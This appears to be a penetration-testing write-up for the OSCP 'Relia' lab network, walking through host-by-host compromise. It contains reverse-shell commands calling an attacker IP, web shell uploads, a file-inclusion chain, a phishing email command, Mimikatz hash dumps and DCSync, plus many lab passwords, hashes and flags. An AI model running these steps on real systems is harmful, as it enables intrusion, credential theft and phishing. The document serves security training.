OSCP-Relia
Machine details
192.168.*.249
- 80
- 445
- 3389
- 8000
192.168.*.248
- 80
- 445
- 3389
192.168.*.247 (WEB02)
- 80
- 443
- 445
- 3389
192.168.*.246
- 80
- 443
- 2222
192.168.*.245
- 21
- 80
- 442
- 2222
- 8000
192.168.*.191 (Login.relia.com)
- 80
- 445
- 3389
192.168.*.189 (MailServer)
- 25
- 110
- 587
192.168.*.250 (WINPREP)
- 445
- 3389
172.16.*.6 (DC02.relia.com)
172.16.*.7
172.16.*.21
172.16.*.19
172.16.*.15
172.16.*.30
172.16.*.14 (WK01)
172.16.*.20
Credentials
Administrator
adrian e3cea06e2de8d54d43b84d4b5bffb5b0
damon i6yuT6tym@
DefaultAccount
Guest
WDAGUtilityAccount
!8@aBRBYdb3!
249 RiteCMS GetShell
Open ports
Port scan
nmap -n -v -sT -A 192.168.135.249
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
8000/tcp open http Apache httpd 2.4.54 ((Win64) OpenSSL/1.1.1p PHP/7.4.30)
|_http-favicon: Unknown favicon MD5: 6EB4A43CB64C97F76562AF703893C8FD
| http-methods:
|_ Supported Methods: GET POST OPTIONS
| http-title: Welcome to XAMPP
|_Requested resource was http://192.168.174.249:8000/dashboard/
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Web directory scan
On port 8000 the /cms path is found; the admin path is /cms/admin.php
gobuster dir -u http://192.168.214.249:8000/ -w /usr/share/wordlists/dirb/common.txt -q -n -e
gobuster dir -u http://192.168.214.249:8000/cms/ -w /usr/share/wordlists/dirb/common.txt -q -n -e -b 302

Weak credentials give access to the admin panel (admin:admin)
Identify the CMS version
Searching Exploit-DB for known vulnerabilities shows a file upload bypass
- https://www.exploit-db.com/exploits/50614
Method 1
Generate a web shell, upload it and get a shell
weevely generate cxaqhq cx.php

Reverse shell via PowerShell
GetShell: information gathering
local.txt is found in c:\Users\adrian\Desktop
System information
Hostname: LEGACY
ProductName: Windows Server 2022 Standard
EditionID: ServerStandard
ReleaseId: 2009
BuildBranch: fe_release
CurrentMajorVersionNumber: 10
CurrentVersion: 6.3
Architecture: AMD64
ProcessorCount: 2
SystemLang: en-US
KeyboardLang: English (United States)
TimeZone: (UTC-08:00) Pacific Time (US & Canada)
IsVirtualMachine: True
Current Time: 4/5/2023 8:36:10 PM
HighIntegrity: False
PartOfDomain: False
Hotfixes: KB5017265, KB5012170, KB5017316, KB5016704,
User information
c:\Users\adrian\Desktop>net user
net user
User accounts for \\LEGACY
-------------------------------------------------------------------------------
Administrator adrian damon
DefaultAccount Guest WDAGUtilityAccount
The command completed successfully.
c:\Users\adrian\Desktop>
LEGACY\Administrator: Built-in account for administering the computer/domain
|->Groups: Administrators
|->Password: CanChange-NotExpi-Req
LEGACY\adrian
|->Groups: Remote Desktop Users,Users
|->Password: CanChange-NotExpi-Req
LEGACY\damon
|->Groups: Administrators,Users
|->Password: CanChange-NotExpi-Req
Obtain local.txt
c:\Users\adrian\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 12DF-ECB8
Directory of c:\Users\adrian\Desktop
04/05/2023 07:24 PM <DIR> .
10/20/2022 01:45 AM <DIR> ..
04/05/2023 07:24 PM 34 local.txt
1 File(s) 34 bytes
2 Dir(s) 10,353,676,288 bytes free
c:\Users\adrian\Desktop>type local.txt
type local.txt
028da52109617b73cbb69307125dfeae
c:\Users\adrian\Desktop>
damon is also a member of the Administrators group
Finding damon's password
The PowerShell command history contains damon's password
PowerShell v2 Version: 2.0
PowerShell v5 Version: 5.1.20348.1
PowerShell Core Version:
Transcription Settings:
Module Logging Settings:
Scriptblock Logging Settings:
PS history file: C:\Users\adrian\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
PS history size: 241B
ipconfig
hostname
echo "Let's check if this script works running as damon and password i6yuT6tym@"
echo "Don't forget to clear history once done to remove the password!"
Enter-PSSession -ComputerName LEGACY -Credential $cred
shutdown /s
Obtaining administrator privileges
Shell via CrackMapExec
crackmapexec smb 192.168.213.249 -u damon -p "i6yuT6tym@"

Obtain proof.txt
PS C:\> type C:\users\damon\Desktop\proof.txt
d7f6e015411c8dbed9c19d25f5e6f1d2
Mimikatz
* Username : adrian
* Domain : LEGACY
* NTLM : e3cea06e2de8d54d43b84d4b5bffb5b0
* SHA1 : 0471c9cb2ae0977d6fa051e6252d272a0e81ca75
Collecting sensitive information
Enumerating the environment shows that Git is present
Locating the Git repository
Because files and folders whose names begin with a dot are hidden on Windows, the /ah option must be added
// common search command
dir /s /b C:\.git
// search that includes hidden files
dir /s /b /ah C:\.git
Note that the search from PowerShell does not find it; only cmd does (compare the two results in the figure)
Git commit history found
Mailbox password found in a commit
Email configuration of the CMS
[email protected]:DPuBT9tGCBrTbR
If something breaks contact [email protected] as he is responsible for the mail server.
Please don't send any office or executable attachments as they get filtered out for security reasons.
248 GetShell
Weak admin credentials
admin:password
File allowlist and file upload
Manually add the extension to the allowlist
Upload a web shell and execute commands
Find the site's absolute path
c:\transfer\r14_2022\build\DNN\wwwroot\

Find the SQL Server configuration
<add name="SiteSqlServer" connectionString="Data Source=.\SQLExpress;Initial Catalog=dnndatabase;User ID=dnnuser;Password=DotNetNukeDatabasePassword!" providerName="System.Data.SqlClient" />

Privilege escalation
Reverse shell
Upload nc and spawn a reverse shell
Or use a PowerShell one-liner
Check current privileges
c:\temp>whoami & whoami /priv
whoami & whoami /priv
iis apppool\defaultapppool
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
Privilege escalation succeeded
Escalated using RasMan.exe
Reverse shell via nc to obtain a SYSTEM shell
cmd.exe /c "c:\windows\temp\RasMan.exe -i -m 1 -c c:\windows\temp\nc.exe 192.168.45.236 1338 -e cmd.exe"

Owned
c:\temp>type C:\users\emma\Desktop\local.txt
type C:\users\emma\Desktop\local.txt
534ca71044d9c546e049d3615a775800
c:\temp>type C:\users\mark\Desktop\proof.txt
type C:\users\mark\Desktop\proof.txt
8b72d547625b9fa4bbe7bbe616bf33f6

AppKey found
AppKey: !8@aBRBYdb3!

Hashes
Dumping hashes with Mimikatz
privilege::debug
token::elevate
lsadump::sam
247
Information gathering
Port scan
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-23 16:07 CST
Warning: 192.168.221.247 giving up on port because retransmission cap hit (6).
Nmap scan report for 192.168.221.247
Host is up (0.24s latency).
Not shown: 65387 closed tcp ports (conn-refused), 132 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.54 ((Win64) OpenSSL/1.1.1p PHP/8.1.10)
|_http-server-header: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/8.1.10
|_http-title: RELIA - New Hire Information
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Apache httpd 2.4.54 ((Win64) OpenSSL/1.1.1p PHP/8.1.10)
| tls-alpn:
|_ http/1.1
|_http-server-header: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/8.1.10
|_http-title: RELIA - New Hire Information
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after: 2019-11-08T23:48:47
|_ssl-date: TLS randomness does not represent time
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=WEB02
| Not valid before: 2023-07-26T16:36:41
|_Not valid after: 2024-01-25T16:36:41
|_ssl-date: 2023-08-23T08:31:49+00:00; 0s from scanner time.
| rdp-ntlm-info:
| Target_Name: WEB02
| NetBIOS_Domain_Name: WEB02
| NetBIOS_Computer_Name: WEB02
| DNS_Domain_Name: WEB02
| DNS_Computer_Name: WEB02
| Product_Version: 10.0.20348
|_ System_Time: 2023-08-23T08:31:39+00:00
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
14020/tcp open ftp FileZilla ftpd
|_ftp-bounce: bounce working!
| ftp-syst:
|_ SYST: UNIX emulated by FileZilla
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-r--r--r-- 1 ftp ftp 237639 Nov 04 2022 umbraco.pdf
14080/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Bad Request
|_http-server-header: Microsoft-HTTPAPI/2.0
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2023-08-23T08:31:41
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1489.41 seconds
Web scan
https://192.168.221.247/assets [Size: 346] [--> https://192.168.221.247/assets/]
https://192.168.221.247/css [Size: 343] [--> https://192.168.221.247/css/]
https://192.168.221.247/dashboard [Size: 349] [--> https://192.168.221.247/dashboard/]
https://192.168.221.247/img [Size: 343] [--> https://192.168.221.247/img/]
https://192.168.221.247/js [Size: 342] [--> https://192.168.221.247/js/]
https://192.168.221.247/pdfs [Size: 344] [--> https://192.168.221.247/pdfs/]
Anonymous FTP file download

Credentials obtained (from umbraco.pdf)
Installing Umbraco 7
- For Umbraco 7 the requirements are
  - IIS 7 or higher
- Database, one of the following: SQL CE, SQL Server 2008 or higher, or MySQL (with support for case insensitive queries)
- ASP.NET 4.5 or 4.5.1. Full-Trust
- Ability to set file/folder permissions for the user that "owns" the Application Pool
- You can use the user account "mark" (@relia.com) for basic configuration of the Umbraco instances on IIS servers (pass "OathDeeplyReprieve91").
  - Please DO NOT share this password with anyone outside the dev team.
- IIS is configured to only allow access to Umbraco using the server FQDN at the moment.
  - e.g. web02.relia.com, not just web02.
Manual installation of Umbraco
1. Download the files from our.umbraco.org/download and unzip them in a folder.
2. Set up a web server hosting the folder you chose. Although IIS is a requirement for production sites, it runs fine for development in IIS Express.
3. Set up file permissions for the folder. For a development server it is okay to have full read/write/modify permissions for the process serving the web page (AppPool or Network service).
4. If you want to set up Umbraco on SQL Server or MySQL, download and install it. Make a new database for Umbraco, and remember the connection string details, including database name, user and password.
5. Open your site at localhost, and follow the wizard to set up your site with the database.
Install Umbraco with NuGet
1. Check for updates to the NuGet package manager. In Visual Studio: Tools > Extensions and Updates > Updates > Visual Studio Gallery. Install if available.
2. Create a new web application with template "ASP.NET Web Application with an Empty template" on .NET Framework 4.5.1.
3. Open the package manager console and run Install-Package UmbracoCms.
4. Press F5 to build and run your new website.
5. Complete the wizard to choose database provider and set up your site.
Exploitation

Configure hosts
192.168.221.247 web02.relia.com

PowerShell reverse shell
- Using an encoded command avoids problems with special characters
Privilege escalation

Get Shell

246
Web arbitrary file read
Read the SSH private key
Crack the SSH private key passphrase
ssh2john id_ecdsa > id_ecdsa.hash
john id_ecdsa.hash
id_ecdsa:fireball

SSH login and privilege escalation
ssh -i id_ecdsa [email protected] -p 2222
An unusual web service is found
PHP code vulnerability
- File inclusion vulnerability
<?php
$which_view=$_GET['view'];
if(isset($which_view)) {
include("views/" . $which_view);
} else {
header('Location: /backend/?view=user.inc');
}
?>
Suspicious PHP file found
PHP code vulnerability
- Command execution vulnerability
<?php echo passthru($_GET["cmd"]); ?>
PHP local file inclusion
curl -v "http://127.0.0.1:8000/backend/?view=../../../../../../../var/crash/test.php&cmd=id"
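A hardened form of the backend/?view= include above, added here as an example (it is not code from the lab or from the original writeup): the view name is checked against an allowlist and the resolved path is confirmed to stay under views/, so a traversal value such as the one in the curl request is rejected with 400 instead of being included. The view names in ALLOWED_VIEWS are assumed; only user.inc appears on the page.

```php
<?php
// Added example, not from the original writeup: a hardened replacement for
//   include("views/" . $_GET['view']);
// A view is selected only by an allowlisted name, and the resolved path is
// checked to remain inside the views directory (defence in depth).
declare(strict_types=1);

// Assumed allowlist: user.inc is the default seen on the page, status.inc is a placeholder.
const ALLOWED_VIEWS = ['user.inc', 'status.inc'];

/**
 * Return the absolute path of an allowlisted view, or null if the request is invalid.
 * The allowlist alone rejects ../ traversal, absolute paths and null bytes; the
 * realpath check guards against a view file that is itself a symlink elsewhere.
 */
function resolve_view(string $requested, string $viewsDir): ?string
{
    if (!in_array($requested, ALLOWED_VIEWS, true)) {
        return null;
    }
    $base = realpath($viewsDir);
    $path = realpath($viewsDir . DIRECTORY_SEPARATOR . $requested);
    if ($base === false || $path === false) {
        return null; // directory or view file does not exist
    }
    // Path must start with "<base>/" so a sibling directory like views2/ is not accepted.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

// Same default the original redirect used; a non-string (e.g. view[]=x) is treated as invalid.
$which_view = $_GET['view'] ?? 'user.inc';
$path = is_string($which_view) ? resolve_view($which_view, __DIR__ . '/views') : null;
if ($path === null) {
    http_response_code(400);
    exit('invalid view');
}
include $path;
```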

GetShell
Upload a PHP reverse shell file
Trigger it with curl to get a shell as the www user
sudo -l shows the www user can switch directly to root
245
SSH private key login
sudo privilege escalation


Account hashes (/etc/shadow)
14
Phishing using the credentials obtained above
Start a WebDAV server
wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root ./webdav

Send the phishing email
sudo swaks -t [email protected] --from [email protected] --attach @config.Library-ms --server 192.168.239.189 --body @body.txt --header "Subject: Staging Script" --suppress-data -ap
Username: [email protected]
Password: DPuBT9tGCBrTbR

Shell obtained

Suspicious file found

cat C:\Users\jim\Pictures\exec.ps1
Function ExtractValidIPAddress($String){
    $IPregex='(?<Address>((25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))'
    If ($String -Match $IPregex) {$Matches.Address}
}
Clear-DnsClientCache
$server = "mail.relia.com"
$port = 110
$enableSSL = $false
$username = "jim"
#$password = "DPuBT9tGCBrTbR"
$password = "Castello1!"
$baseFolder = "C:\attachments"
function saveAttachment
{
    Param
    (
        [System.Net.Mail.Attachment] $attachment,
        [string] $outURL
    )
    New-Item -Path $outURL -ItemType "File" -Force | Out-Null
    $outStream = New-Object IO.FileStream $outURL, "Create"
    $attachment.contentStream.copyTo( $outStream )
    $outStream.close()
}
[Reflection.Assembly]::LoadFile("C:\Users\jim\Pictures\OpenPop.dll")
$pop3Client = New-Object OpenPop.Pop3.Pop3Client
Write-Output $server
$pop3Client.connect( $server, $port, $enableSSL )
$pop3Client.authenticate( $username, $password )
#$pop3Client.authenticate( $username, $password, "UsernameAndPassword" )
$messageCount = $pop3Client.getMessageCount()
for ( $messageIndex = 1; $messageIndex -le $messageCount; $messageIndex++ )
{
    #$uid = $pop3Client.getMessageUid( $messageIndex )
    #$incomingMessage = $pop3Client.getMessage( $messageIndex )
    $incomingMessage = $pop3Client.getMessage( $messageIndex ).toMailMessage()
    foreach ( $attachment in $incomingMessage.attachments )
    {
        # do something with attachments, tbd - .lnk - .doc word I guess?
        if ($attachment.name -like "*.Library-ms*")
        {
            $filename = $attachment.name
            $attachmentURL = Join-Path -Path $baseFolder -ChildPath $filename
            saveAttachment $attachment $attachmentURL
        }
    }
}
$pop3Client.DeleteAllMessages()
if ( $pop3Client.connected )
{
    $pop3Client.disconnect()
}
$pop3Client.dispose()
Get-ChildItem 'C:\attachments\*.Library-ms' | ForEach-Object {
    $url = Get-Content $_ | Select-String '<url>'
    $ip = ExtractValidIPAddress $url
    $share = "\\$ip\DavWWWRoot\"
    net use H: $share
    Get-ChildItem "$share\*.lnk" | ForEach-Object {
        copy $_.FullName C:\Windows\Tasks\temp.lnk
        net use H: /delete
        Unblock-File -Path C:\Windows\Tasks\temp.lnk
        powershell -c invoke-item C:\Windows\Tasks\temp.lnk
        Get-ChildItem -Path C:\attachments | Where-Object Extension -in ('.Library-ms') | foreach { $_.Delete()}
        Remove-Item -Force C:\Windows\Tasks\temp.lnk
    }
}
Clear-RecycleBin -Force
KeePass .kdbx file found
Decrypted successfully
KeePass2 database decryption
Password extraction with LaZagne

Obtain local.txt and proof.txt

191
RDP login
xfreerdp /v:192.168.242.191:3389 /u:dmzadmin /p:SlimGodhoodMope
Domain penetration
Information gathering
Domain admins
net group "domain admins" /domain
Administrator dan internaladmin
Domain controller
Domain user list
net user /domain
Administrator andrea anna
brad dan Guest
iis_service internaladmin jenny
jim krbtgt larry
maildmz michelle milana
mountuser
Shell loop using smbclient to enumerate file shares on each host
for i in {6,7,21,19,15,30,14,20}; do proxychains4 smbclient -L //172.16.86.${i} -U relia.com/jim%Castello1!; done
Hosts .6 and .21 have interesting shares. Browsing the files, a PowerShell transcript on .21 contains a password:
**********************
Windows PowerShell transcript start
Start time: 20221019132304
Username: FILES\Administrator
RunAs User: FILES\Administrator
Configuration Name:
Machine: FILES (Microsoft Windows NT 10.0.20348.0)
Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Process ID: 5936
PSVersion: 5.1.20348.859
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.20348.859
BuildVersion: 10.0.20348.859
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
Transcript started, output file is C:\Users\Administrator\Documents\PowerShell_transcript.FILES.9_DjDa0f.20221019132304.txt
PS C:\Users\Administrator> $spass = ConvertTo-SecureString "vau!XCKjNQBv2$" -AsPlaintext -Force
PS C:\Users\Administrator> $cred = New-Object System.Management.Automation.PSCredential("RELIA\Administrator", $spass)
PS C:\Users\Administrator> Enter-PSSession -ComputerName INTRANET -Credential $cred
Enter-PSSession : Connecting to remote server INTRANET failed with the following error message : WinRM cannot complete
the operation. Verify that the specified computer name is valid, that the computer is accessible over the network, and
that a firewall exception for the WinRM service is enabled and allows access from this computer. By default, the WinRM
firewall exception for public profiles limits access to remote computers within the same local subnet. For more
information, see the about_Remote_Troubleshooting Help topic.
Taking the domain controller
DCSync
PS C:\> ./m.exe privilege::debug log "lsadump::dcsync /domain:relia.com /all /csv" exit
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # privilege::debug
Privilege '20' OK
mimikatz(commandline) # log
Using 'mimikatz.log' for logfile : OK
mimikatz(commandline) # lsadump::dcsync /domain:relia.com /all /csv
[DC] 'relia.com' will be the domain
[DC] 'DC02.relia.com' will be the DC server
[DC] Exporting domain 'relia.com'
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
mimikatz(commandline) # exit
Bye!

Hosts .6, .7, .21, .15 and .189 owned
6
PS C:\> cat C:\users\Administrator\Desktop\proof.txt
1740a52a921adc025502c7a03d70bf22
7
PS C:\> cat C:\users\michelle\Desktop\local.txt
d6caa6622087693633976bbc496e32f1
PS C:\> cat C:\users\Administrator\Desktop\proof.txt
acdf6d94c4c7b6ebd9a1cb8a4b650b10
Local account hashes
21
PS C:\> cat C:\users\Administrator\Desktop\proof.txt
ed42ff3c31f5f4fcb81ac8a17fd9e361
15
PS C:\> cat C:\users\andrea\Desktop\local.txt
b76ae7f51a98090f84329cc27874001c
PS C:\> cat C:\users\milana\Desktop\proof.txt
960f03e8c4a32173463e50d9153bb283
Local account hashes
30 MongoDB
PS C:\> cat C:\users\Administrator\Desktop\proof.txt
c43ba8370e020531c0d6c2677b434884
Local account hashes
14
PS C:\> cat C:\users\offsec\Desktop\proof.txt
a11b1db8140dac6a7f004bef27445dae
PS C:\> cat C:\users\jim\Desktop\local.txt
ce46a4a60d973bb0cedbb1f679a3f777
File:
C:\Users\jim\Documents\Database.kdbx
Local account hashes
189
PS C:\> cmd.exe /c "dir /s/b c:\proof.txt"
c:\Documents and Settings\Administrator\Desktop\proof.txt
c:\Users\Administrator\Desktop\proof.txt
PS C:\> type c:\Users\Administrator\Desktop\proof.txt
7abc53251d6238edafc4a47c366a9f84

Two hosts remain: .19 and .20
Decrypting the KeePass database from host .15 reveals sensitive information
sarah@backup:~$ cat local.txt
63859027bec34e61664daac1a21fa992
20
$ cat /root/proof.txt
4385803a3643c96fa1da5a9df6930328
$ cat /home/andrew/local.txt
192d05d2dd9012544efcd9688863e030